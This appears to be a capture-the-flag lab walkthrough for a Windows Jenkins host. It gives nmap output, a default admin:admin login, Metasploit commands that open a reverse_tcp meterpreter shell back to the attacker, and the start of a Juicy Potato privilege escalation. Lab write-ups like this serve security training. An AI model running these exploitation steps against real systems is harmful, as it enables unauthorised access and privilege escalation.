kali@kali:~/cyberseclabs$ nmap 172.31.1.19
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 10:33 EDT
Nmap scan report for 172.31.1.19
Host is up (0.10s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds
We get a Jenkins login page lets try some default credentials the good old admin:admin…
Step 2: Exploitation
Browsing around the console and doing some clicking around, I have no idea what the hell I am looking for. I see a script console and this starts to stir up some evil thoughts on how I can exploit this thing. Did some googling and sure enough I found a Metasploit module that allows us to exploit this bad boy using Java code execution. This exploit can also be done manually without using Metasploit’s spoon feeding by throwing in commands to execute in the console.
Let’s now fire up Metasploit from our terminal and use the exploit module following the commands in order:
msfconsole
use exploit/multi/http/jenkins_script_console
set RHOSTS 172.31.1.19
set RPORT 8080
set TARGETURI /script/
set USERNAME admin
set PASSWORD admin
by default this module likes to use reverse_https payload for our reverse connection back. I switched to reverse_tcp for consistency.
set payload windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT 7777
run
Now it starts to exploit giving us back a meterpreter session. I typed the command shell for a detailed shell.
C:\Users\ben\Desktop>type access.txt
type access.txt
11d92ba4a09c10adf0eb3636ad4c57e5
C:\Users\ben\Desktop>
Step 3: Post Exploitation
I ran to see if this thing was vulnerable to the Juicy Potato exploit
C:\Users\ben\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Users\ben\Desktop>
We can see that SeImpersonatePrivilege is Enabled. This means we can use the famous Juicy Potato attack.
I found a Juicy Potato exploit module for Metasploit. While still in the basic command shell, press Ctrl-Z to background the session. Hit Y if it asks you to background it.
We are now dropped back to the main Metasploit prompt, and we can verify any sessions we have running in the background with the sessionscommand:
use exploit/windows/local/ms16_075_reflection_juicy
set SESSION 1
set LHOST <your ip>
run